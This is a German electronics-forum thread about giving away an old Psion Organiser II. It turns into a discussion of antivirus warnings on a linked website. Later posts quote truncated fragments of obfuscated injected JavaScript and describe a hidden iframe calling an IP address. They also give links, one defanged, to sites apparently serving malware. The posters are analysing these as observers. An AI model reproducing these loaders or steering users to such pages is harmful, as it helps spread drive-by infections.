Forum: Markt Psion Organiser II


von Christoph M. (maije)


Angehängte Dateien:

Lesenswert?

Hallo Leute!

Beim Aufräumen hab ich heute diesen Psion Organiser gefunden. Ich hab 
ihn selber damals bei meinem Ferialjob aus dem Müll gezogen und 
mitgenommen weil ich das Teil irgendwie lustig fand :)

Da er bei mir jetzt jedoch nur herumliegt und ich mir gedacht habe das 
ihn vielleicht ein Sammler haben will würde ich ihn verschenken. Wenn 
sich keiner meldet landet er halt im Müll.

Er ist voll funktionsfähig und es sind zwei Datapaks dabei (128k & 16k).
Selbstabholung währe natürlich auch möglich (Raum Graz).

Lg,
Christoph

von Manfred F. (manfred_f)


Lesenswert?

Ein echtes Sammlerstück.
Bei Esoterikern sehr beliebt:

http://www.pulster.de/index.htm?psion_psion_2.htm

Einen Hunderter bringt der noch locker...

von Christoph M. (maije)


Lesenswert?

Manfred Freise schrieb:
> Ein echtes Sammlerstück.
> Bei Esoterikern sehr beliebt:
>
> http://www.pulster.de/index.htm?psion_psion_2.htm
>
> Einen Hunderter bringt der noch locker...

Hehe, interessant wofür man die Dinger alles einsetzten kann^^

von Rainer V. (rudi994)


Lesenswert?

Echt cool ! Rarität Psion "Pupsi Edition 2010" für 10000 € bezahlt jeder 
locker aus der Portokasse. Laut Beschreibung entsteht so ein Teil in 
geheimen Laborversuchen, wo Mikroprozessoren bis zum Stackoverflow zu 
rekursiven Vermehrungsprozeduren gezwungen werden (oder so ähnlich). 
Sauerei ! Zu manch ohnehin preisgünstigerem Gerät gibt es gratis ein 
Debug Board mit JTag-Port zum Aufpeppen ausgelutscher Flash-Proms. Kann 
man die nicht einfach auf die heisse Herdplatte legen ? So habe ich 
früher oft leere Zink-Kohle-Batterien wieder aufgemöbelt. Bis neulich.

von F. F. (foldi)


Lesenswert?

Einige meiner Kollegen sind froh den noch zu haben, da sie so nicht mit 
dem Laptop hinter dem Fahrzeug hinterher rennen müssen, wenn sie die 
Lenkung einstellen.
Ich hatte meinen abgegeben, da ich keine Hochregalstapler mehr mache.

Für die Curtis Steuerungen hab ich auch noch ein Handprogrammiergerät. 
Auch wenn das Display die obere Zeile kaputt hat, ich bin ebenfalls froh 
den zu haben. Den Laptop sicher am Fahrzeug unter zu bringen und dann 
ne Probefahrt zu machen ist nicht immer so einfach.

So manche "alte Technik" hat auch in gewissen Bereichen noch ihre 
Vorteile.

Der Psion war für meinen Einsatzzweck damals richtig genial.

von Christoph M. (maije)


Lesenswert?

So, das Teil ist vergeben :)

von Martin S. (docmartin)


Lesenswert?

..und ist gut angekommen - Danke nochmals ;-))

Ahoi, Martin

von Christoph M. (maije)


Lesenswert?

Martin Schneider schrieb:
> ..und ist gut angekommen - Danke nochmals ;-))
>
> Ahoi, Martin

Freut mich das das Ding ein neues Zuhause gefunden hat. Viel Spaß noch 
damit :)

von Magnus M. (magnetus) Benutzerseite


Angehängte Dateien:

Lesenswert?

Manfred Freise schrieb:
> http://www.pulster.de/index.htm?psion_psion_2.htm


***************
***************
**           **
**  ACHTUNG  **
**           **
***************
***************


Ich weiss ja nicht ob mein Norton gerade ein wenig übertreibt, aber beim 
Aufruf des Links meldet er einen Angriffsversuch...

von Micha (Gast)


Lesenswert?

Nee, der Norton scheint nicht zu übertreiben, mein Schirmchen meckert 
auch.
Micha

von Christoph M. (maije)


Lesenswert?

Magnus M. schrieb:
>
> Ich weiss ja nicht ob mein Norton gerade ein wenig übertreibt, aber beim
> Aufruf des Links meldet er einen Angriffsversuch...

Huh, als mein Kaspersky macht gar nix :)

von mhh (Gast)


Lesenswert?

Bitdefender fühlt auch keine Gefahr.

von troll (Gast)


Lesenswert?

Ja, Avira meckert und aus gutem Grund:
1
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6......
sieht äußerst verdächtig aus. Ich geh dann mal Malzilla anschmeißen.

von Reinhard S. (rezz)


Lesenswert?

Magnus M. schrieb:
> Manfred Freise schrieb:
>> http://www.pulster.de/index.htm?psion_psion_2.htm
>
> Ich weiss ja nicht ob mein Norton gerade ein wenig übertreibt, aber beim
> Aufruf des Links meldet er einen Angriffsversuch...

Bei mir meckert sogar Opera selber, das die Seite schon gemeldet sei.

von mhh (Gast)


Angehängte Dateien:

Lesenswert?

Das steht am unteren Bildschirmrand:

'); document.writeln(''); document.writeln(''); document.writeln(''); } 
else { document.writeln(''); document.writeln(''); //

so wie im Anhang ein Stück zu sehen (horizontal gekürzt).

von troll (Gast)


Lesenswert?

mhh schrieb:
> '); document.writeln(''); document.writeln(''); document.writeln(''); }
> else { document.writeln(''); document.writeln(''); //
Das gibt ja nur ein paar Nullstrings(?) aus. Ich tippe ganz stark auf 
oben zitierten Code am Seitenanfang. Das ist nämlich ein verstecktes 
Iframe was auf 216.  119.114.  164/esd.php oder so verweist, da kommt 
aber nur ein langweiliges "Ok" zurück. Ich hatte beim ersten Versuch 
eine Weiterleitung auf eine andere Seite deren Adresse ich mir nicht 
gemerkt habe, aber alle Versuche das erneuert zu provozieren sind 
fehlgeschlagen. Naja.

von Rainer V. (rudi994)


Lesenswert?

Trojaner-Alarm, Webseite gesperrt. Das hatte ich doch gestern schon. 
Wenn GData Security Software weiterhin so zuverlässig arbeitet, dann 
kann ich bald nirgendwo mehr surfen. Hier ist noch so eine Testseite 
auf eigene Gefahr :  www[dot]schwitt[dot]de/radiobasteln/index.html

von troll (Gast)


Lesenswert?

Rainer V. schrieb:
>  www[dot]schwitt[dot]de/radiobasteln/index.html
Das ist ja fast schon Kunst!
1
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:
Puh, sieht nach schwerer Kost aus. Mal sehen ob man da was 
nachvollziehen kann. Ist schon erschreckend wie viele Seiten mit 
Schadcode infiziert sind, vor nicht all zu langer Zeit(??) hatte es z.B. 
auch Zabex erwischt.

von Frank (Gast)


Lesenswert?

Super...bei mir meckert der Avira kein bisschen...

von Rainer V. (rudi994)


Lesenswert?

troll schrieb:
> Das ist ja fast schon Kunst!

Oder eine neue Weltformel. Wenn Heisenberg das wüßte ...

Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.